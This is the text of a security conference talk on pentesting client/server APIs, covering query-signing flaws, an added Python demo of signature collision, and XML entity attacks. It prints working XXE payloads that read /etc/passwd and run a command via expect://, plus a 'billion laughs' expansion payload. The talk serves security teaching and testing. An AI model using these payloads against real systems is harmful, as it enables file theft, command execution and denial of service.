Pentesting client/server API. Sergey Belov

Academic year: 2021



© 2002—2014, Digital Security


Senior Security Auditor at Digital Security

BugHunter: Google, Yandex, Badoo, Yahoo +++

Writer: habrahabr, Xakep magazine

CTF: DEFCON 2012 CTF Final, Chaos Construction CTF’2013

Speaker: CodeFest 2012, ZeroNights 0x03


What are we talking about?



Hacking via API


What should we test?

Logic!

Bypassing restrictions (sqli/xss)

Parameter tampering

Developing



42 Kb…


…10 Gb?


…100 Gb?


Say HELLO to


The evil of JavaScript and


Query signing

Sign = sha*(…+DATA+…)


Say hello again.


A=1&B=2&C=3

07ce36c769ae130708258fb5dfa3d37ca5a67514


What does the attacker know?

Original data

Sign (token)


What does the attacker want?


Can sign new query without API key!

Vkontakte: sig = md5(name1=value1name2=value2api_secret)

Mail.RU sig = md5(uid + params + private_key)
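In the Vkontakte-style scheme above the name=value pairs are concatenated with no delimiter before the secret is appended, so two different parameter sets can serialise to the same signed string and share one signature. The following is an added example, not code from the talk: it puts that construction beside an HMAC over an unambiguous, URL-encoded canonical form, and checks which of the two accepts a shifted parameter set. The secret, parameter names and helper names are constructed for the demo.

```python
import hashlib
import hmac
from urllib.parse import urlencode

# Constructed demo secret; a real api_secret is never embedded in code.
API_SECRET = "demo-secret-not-real"


def vk_style_sig(params: dict, secret: str = API_SECRET) -> str:
    """sig = md5(name1=value1name2=value2...api_secret): the pairs are
    sorted and joined with no delimiter, as in the scheme on the slide."""
    body = "".join(f"{k}={v}" for k, v in sorted(params.items()))
    return hashlib.md5((body + secret).encode()).hexdigest()


def hardened_sig(params: dict, secret: str = API_SECRET) -> str:
    """HMAC-SHA256 over a canonical form with escaped, '&'-separated pairs,
    so key/value boundaries cannot be reinterpreted by the signer."""
    canonical = urlencode(sorted(params.items()))
    return hmac.new(secret.encode(), canonical.encode(), hashlib.sha256).hexdigest()


def verify(params: dict, sig: str, signer, secret: str = API_SECRET) -> bool:
    """Server-side check: recompute with the given signer, compare in constant time."""
    return hmac.compare_digest(signer(params, secret), sig)


# Constructed requests: {"a": "1", "b": "2"} and {"a": "1b=2"} both flatten
# to the undelimited string "a=1b=2", so the weak scheme signs them identically.
INTENDED = {"a": "1", "b": "2"}
SHIFTED = {"a": "1b=2"}


def collides(signer) -> bool:
    """True if the signer cannot tell the two parameter sets apart."""
    return signer(INTENDED) == signer(SHIFTED)


if __name__ == "__main__":
    for name, signer in (("vk_style_sig", vk_style_sig), ("hardened_sig", hardened_sig)):
        sig = signer(INTENDED)
        print(name, "collision:", collides(signer),
              "shifted set accepted:", verify(SHIFTED, sig, signer))
```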


Request hijacking…


DTD Example:

<!ENTITY writer "Donald Duck.">

<!ENTITY copyright "Copyright W3Schools.">

XML example:


XML entities?


<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>


<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "expect://id" >]>


<?xml version="1.0" ?>
<!DOCTYPE lolz [ <!ENTITY lol "lol"> <!ELEMENT lolz (#PCDATA) >
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;" >
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;" >
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;" >
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;" >
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;" >
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;" >


Testing:

https://www.owasp.org/index.php/Testing_for_XML_Injection_(OWASP-DV-008)

XXE to RCE https://gist.github.com/joernchen/3623896

Development:


Finally:

Re-test all interface restrictions;

Specific compressions;

JS callbacks;


twitter.com/sergeybelove

sbelov@dsec.ru

Digital Security in Moscow: (495) 223-07-86

Digital Security in Saint Petersburg: (812) 703-15-47

Thanks for your attention!

Questions?
